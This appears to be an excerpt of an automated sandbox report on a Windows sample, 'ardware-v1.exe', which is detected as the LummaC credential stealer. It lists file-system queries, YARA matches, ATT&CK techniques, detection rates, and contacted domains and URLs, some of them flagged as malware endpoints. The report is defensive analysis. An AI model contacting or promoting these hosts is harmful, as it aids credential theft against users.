                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2486324399.0000000001085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2521127608.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2422257557.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ardware-v1.exe PID: 7748, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: ardware-v1.exe PID: 7748, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		131
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information                		LSASS Memory11
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ardware-v1.exe21%VirustotalBrowse
                ardware-v1.exe24%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/apiR80%Avira URL Cloudsafe
                https://sordid-snaked.cyou/api7100%Avira URL Cloudmalware
                https://lev-tolstoi.com/e&quot0%Avira URL Cloudsafe
                https://deafeninggeh.biz/apie100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apimSvx0%Avira URL Cloudsafe
                https://lev-tolstoi.com/api%0%Avira URL Cloudsafe
                https://store.steampow0%Avira URL Cloudsafe
                https://lev-tolstoi.com/.$Hwl0%Avira URL Cloudsafe
                https://lev-tolstoi.com/avatar0%Avira URL Cloudsafe
                https://deafeninggeh.biz/P:100%Avira URL Cloudmalware
                https://lev-tolstoi.com/api0%Avira URL Cloudsafe
                https://lev-tolstoi.com:443/apil0%Avira URL Cloudsafe
                https://community.fastly.steamstatic.0%Avira URL Cloudsafe
                http://ocsp.sectigo.com000%Avira URL Cloudsafe
                https://lev-tolstoi.com/pxT0%Avira URL Cloudsafe
                https://awake-weaves.cyou/api8100%Avira URL Cloudmalware
                https://spend-shiny.cyou:443/api100%Avira URL Cloudmalware
                https://lev-tolstoi.com/d0%Avira URL Cloudsafe
                https://lev-tolstoi.com/0%Avira URL Cloudsafe
                https://awake-weaves.cyou/apiL100%Avira URL Cloudmalware
                https://lev-tolstoi.com/9000%Avira URL Cloudsafe
                https://lev-tolstoi.com/er0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apim0%Avira URL Cloudsafe
                https://deafeninggeh.biz:443/api1100%Avira URL Cloudmalware
                spend-shiny.cyou100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		104.21.66.86
                  		truetrue
                    		unknown
                    immureprech.biz
                    		178.62.201.34
                    		truefalse
                      		high
                      deafeninggeh.biz
                      		45.77.249.79
                      		truefalse
                        		high
                        sordid-snaked.cyou
                        		unknown
                        		unknownfalse
                          		high
                          diffuculttan.xyz
                          		unknown
                          		unknownfalse
                            		high
                            effecterectz.xyz
                            		unknown
                            		unknownfalse
                              		high
                              spend-shiny.cyou
                              		unknown
                              		unknowntrue
                                		unknown
                                awake-weaves.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  wrathful-jammy.cyou
                                  		unknown
                                  		unknownfalse
                                    		high
                                    debonairnukk.xyz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        		high
                                        deafeninggeh.bizfalse
                                          		high
                                          effecterectz.xyzfalse
                                            		high
                                            wrathful-jammy.cyoufalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                awake-weaves.cyoufalse
                                                  		high
                                                  immureprech.bizfalse
                                                    		high
                                                    https://immureprech.biz/apifalse
                                                      		high
                                                      debonairnukk.xyzfalse
                                                        		high
                                                        https://lev-tolstoi.com/apitrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        spend-shiny.cyoutrue
                                                        • Avira URL Cloud: malware
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/chrome_newtabardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://player.vimeo.comardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0ardware-v1.exefalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcastsardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://immureprech.biz/piardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://deafeninggeh.biz/P:ardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#ardware-v1.exefalse
                                                                          		high
                                                                          http://ocsps.ssl.com0?ardware-v1.exefalse
                                                                            		high
                                                                            http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0ardware-v1.exefalse
                                                                              		high
                                                                              https://lev-tolstoi.com/avatarardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://lev-tolstoi.com/e&quotardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://store.steampowered.com/subscriber_agreement/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.gstatic.cn/recaptcha/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://wrathful-jammy.cyou/apiardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.valvesoftware.com/legal.htmardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://lev-tolstoi.com/apiR8ardware-v1.exe, 00000000.00000003.2517557532.0000000001085000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://store.steampowardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.youtube.comardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.google.comardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lev-tolstoi.com/.$Hwlardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://lev-tolstoi.com/api%ardware-v1.exe, 00000000.00000003.2422428346.0000000001049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://sordid-snaked.cyou/api7ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lev-tolstoi.com/apimSvxardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://deafeninggeh.biz/apieardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://s.ytimg.com;ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxxardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://lev-tolstoi.com/dardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543259774.00000000010D2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
